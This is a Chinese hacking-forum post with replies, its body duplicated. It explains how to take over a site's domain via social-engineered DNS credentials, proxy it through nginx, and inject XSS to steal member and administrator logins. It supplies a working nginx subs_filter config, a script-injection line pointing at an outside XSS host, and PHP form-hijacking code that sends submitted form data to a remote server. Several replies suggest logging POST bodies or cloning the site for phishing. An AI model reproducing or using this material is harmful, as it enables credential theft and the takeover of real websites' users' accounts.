利用反代获取管理员信息与脱裤
思路来源于https://www.t00ls.com/thread-37421-1-1.html
这个帖子里讨论的
假如我们运气好社工到了域名密码
能否做一个类似CND加速代理的东西,把域名解析到我们自己的服务器,然后在我们自己服务器上监控数据截取后台地址及密码等敏感信息
答案肯定是可以的,而且nginx反代是最方便的玩法,但仅仅获取管理密码,会不会太无聊了?
脱裤理论上也是可以的~
这样即使拿不到服务器权限,也可以危害到数据库。
思路大概是这样:
获取到域名或dns权限-配置cname 或者a解析到自己的反代服务器-反代替换所有数据包加入xss代码-获取到登录表单
0x01 nginx反代配置
替换包内容可以用ngx_http_subs_filter_module来解决,效果都是差不多的。
具体的安装过程和普通的三方模块一样
不会的可以参考:http://www.cnblogs.com/dudu/p/nginx-subs_filter.html
安装过程不再赘述
配置
新建一个站点的配置文件,
在/etc/nginx/nginx.config中配置subs_filter
如下内容
server
{
listen 80;
server_name www.反代服务器.com;
location / {
proxy_pass http://www.目标服务器.cn;
proxy_redirect off;
proxy_cache nuget-cache;
proxy_cache_valid 168h;
proxy_ignore_headers Set-Cookie Cache-Control;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
subs_filter 11001072 123456789;
index index.html index.htm index.php;
}
}
这里的subs_filter 11001072是网站上需要替换的代码, 123456789是你想替换上去的内容
一般就替换</body>到<script src=http://xss.net/xss></script></body>
重启nginx服务
systemctl restart nginx
另外 配置文件里有一个 sub_filter_once on | off;
是控制替换次数的 on就会替换一次 off就全部替换 看具体情况而定
0x02 xss代码配置
这里需要用到xss的表单劫持,一般用xss.js就够了。
百度到的xss平台一般都有这个模块,http://webxss.net/ 比如这个。。
或者用一些第三方模块:都可以实现。
0x03 最后
都配置ok之后,再打开目标站的就会自动被解析到我们的反代服务器,然后会员、管理员登录信息就都会被获取到xss平台,可以实现类似脱裤的效果。
成功案例参考:
这个帖子里讨论的
假如我们运气好社工到了域名密码
能否做一个类似CND加速代理的东西,把域名解析到我们自己的服务器,然后在我们自己服务器上监控数据截取后台地址及密码等敏感信息
答案肯定是可以的,而且nginx反代是最方便的玩法,但仅仅获取管理密码,会不会太无聊了?
脱裤理论上也是可以的~
这样即使拿不到服务器权限,也可以危害到数据库。
思路大概是这样:
获取到域名或dns权限-配置cname 或者a解析到自己的反代服务器-反代替换所有数据包加入xss代码-获取到登录表单
0x01 nginx反代配置
替换包内容可以用ngx_http_subs_filter_module来解决,效果都是差不多的。
具体的安装过程和普通的三方模块一样
不会的可以参考:http://www.cnblogs.com/dudu/p/nginx-subs_filter.html
安装过程不再赘述
配置
新建一个站点的配置文件,
在/etc/nginx/nginx.config中配置subs_filter
如下内容
server
{
listen 80;
server_name www.反代服务器.com;
location / {
proxy_pass http://www.目标服务器.cn;
proxy_redirect off;
proxy_cache nuget-cache;
proxy_cache_valid 168h;
proxy_ignore_headers Set-Cookie Cache-Control;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
subs_filter 11001072 123456789;
index index.html index.htm index.php;
}
}
这里的subs_filter 11001072是网站上需要替换的代码, 123456789是你想替换上去的内容
一般就替换</body>到<script src=http://xss.net/xss></script></body>
重启nginx服务
systemctl restart nginx
另外 配置文件里有一个 sub_filter_once on | off;
是控制替换次数的 on就会替换一次 off就全部替换 看具体情况而定
0x02 xss代码配置
这里需要用到xss的表单劫持,一般用xss.js就够了。
百度到的xss平台一般都有这个模块,http://webxss.net/ 比如这个。。
或者用一些第三方模块:
<?php /**
* @desc 转发文件
* @team C0dePlay Team
* @author Yaseng WwW.Yaseng.Me [[email protected]]
*/ ini_set('display_errors', 'Off'); $id=$_GET['id']; if($_GET['y']){ $funcname=$_GET['funcname'];
$formname='"'.$_GET['formname'].'"'; $formid='"'.$_GET['formid'].'"'; echo "
var xurl='http://xxx.sinaapp.com/xxxxx/xform.php?id={$id}';
var form= ( $formname ) ? document.forms[$formname] : document.getElementById($formid);
"; if($funcname){ echo 'function getForm(e){var t,n="",r="",i,s;for(t=0;t<e.length;t++){i=e[t];
if(i.name!=""){if(i.type=="select-one")s=i.options[i.selectedIndex].value;else if(i.type=="checkbox"
||i.type=="radio"){if(i.checked==0)continue;s=i.value}else{if(i.type=="button"||i.type=="submit"
||i.type=="reset"||i.type=="image")continue;s=i.value}s=encodeURIComponent(s),n+=r+i.name+"="+s,r="&"}}return n} '."
$funcname=xss.proxy($funcname,function(){
xss.ajax(xurl,getForm(form));
})" ;
}else{ echo 'xss.xform(form,xurl);';
}
}else{ $url=$_SERVER['HTTP_REFERER']; $data=""; foreach($_REQUEST as $k=>$v){ $data.="|$k=$v";
}
file_get_contents("http://xxx.sinaapp.com/index.php?do=api&id={$id}&data={$data}&url={$url}");
} ?>
0x03 最后
都配置ok之后,再打开目标站的就会自动被解析到我们的反代服务器,然后会员、管理员登录信息就都会被获取到xss平台,可以实现类似脱裤的效果。
成功案例参考:
评论53次
一个nginx反向代理就可以了 都不用那么麻烦 连sub_filter模块都不用装 日志开启记录POST 内容
实践下~~
这个方法我是头一次遇到,感觉思路还可以,找个环境尝试下看看
赞, 我一直都是直接反代, 然后把Nginx默认日志修改为记录post内容, 然后放几天查一下日志找管理信息..sis, 红河谷都是酱紫搞滴
这个也可以 但上面我说过 分析日志整理日志不方便
这种 直接ctrl+s 把原本网站复制下来 做个钓鱼不就完了
功能很多都会bug 你想简单了兄弟
dns能控制那啥都能干了,xss是不是有些麻烦,而且容易被发现
因为只获取表单信息 所以xss不会被一般的浏览器拦截
改天有机会试试
赞, 我一直都是直接反代, 然后把Nginx默认日志修改为记录post内容, 然后放几天查一下日志找管理信息.. sis, 红河谷都是酱紫搞滴
这种 直接ctrl+s 把原本网站复制下来 做个钓鱼不就完了
厉害了 ..
dns能控制那啥都能干了,xss是不是有些麻烦,而且容易被发现
以前有过想过写一个这种反代思路的工具的想法,使用python获取你要访问的页面,然后展示到你面前,管理用户请求和目标服务器返回的时间。这一块的话,python下倒是有很多已经实现的例子是解决其他需求的,也可以用到渗透中来。虽然平时我弄的时候也是用nginx多一点。 例如:https://github.com/aploium/zmirror
https://www.secpulse.com/archives/50971.html 安全脉搏有一次就是这样另外P神在wooyun的时候有一篇文章是openresty+lua在反向代理服务中的玩法,也挺有意思的
嗯 思路都差不多 我也对比过几个反代应用 都没有ngnix配置起来方便
哦,那直接做个论坛解析过去是不是效果更好,或者把域名转移
那样动静比这个大的多呀 ..
https://www.secpulse.com/archives/50971.html 安全脉搏有一次就是这样 另外P神在wooyun的时候有一篇文章是openresty+lua在反向代理服务中的玩法,也挺有意思的
哦,那直接做个论坛解析过去是不是效果更好,或者把域名转移
最后一张图加载不出来呢。
帖子bug了 我放二楼了
最后一张图加载不出来呢。
学xi了,找机会实践一下
学xi了 我的哥